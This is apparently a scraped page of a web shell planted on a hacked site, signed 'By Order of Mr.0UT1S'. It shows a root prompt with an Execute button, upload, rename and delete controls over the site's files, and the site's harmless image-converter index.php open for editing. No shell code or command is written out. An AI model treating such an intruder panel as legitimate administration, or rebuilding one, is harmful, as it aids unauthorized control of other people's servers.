home
/
aioutajg
/
public_html
/
Go to Home Directory
+
Upload
Create File
root@0UT1S:~$
Execute
By Order of Mr.0UT1S
[DIR] ..
N/A
[DIR] assets
N/A
[DIR] compressor
N/A
[DIR] converter
N/A
[DIR] includes
N/A
[DIR] resizer
N/A
[DIR] uploads
N/A
.htaccess
2.03 KB
Rename
Delete
32.htaccess
1.27 KB
Rename
Delete
favicon.ico
129.96 KB
Rename
Delete
index.php
1.15 KB
Rename
Delete
secure-delete.php
300 bytes
Rename
Delete
<?php // Include reusable components include_once __DIR__ . '/includes/head.php'; include_once __DIR__ . '/includes/header.php'; ?> <main class="container my-5"> <section class="text-center mb-5"> <h1 class="display-4">Welcome to ImgCCR</h1> <p class="lead">Your go-to tool for converting images quickly and securely.</p> <a href="/converter/" class="btn btn-primary btn-lg">Try Image Converter</a> </section> <section class="row justify-content-center"> <div class="col-md-4"> <h3>Fast & Secure</h3> <p>All your files are processed securely and deleted immediately after conversion.</p> </div> <div class="col-md-4"> <h3>User-Friendly</h3> <p>Simple interface designed for ease of use without compromising functionality.</p> </div> <div class="col-md-4"> <h3>SEO Optimized</h3> <p>Built with modern SEO practices to ensure maximum visibility.</p> </div> </section> </main> <?php include_once __DIR__ . '/includes/back-to-top.php'; include_once __DIR__ . '/includes/footer.php'; ?>
Save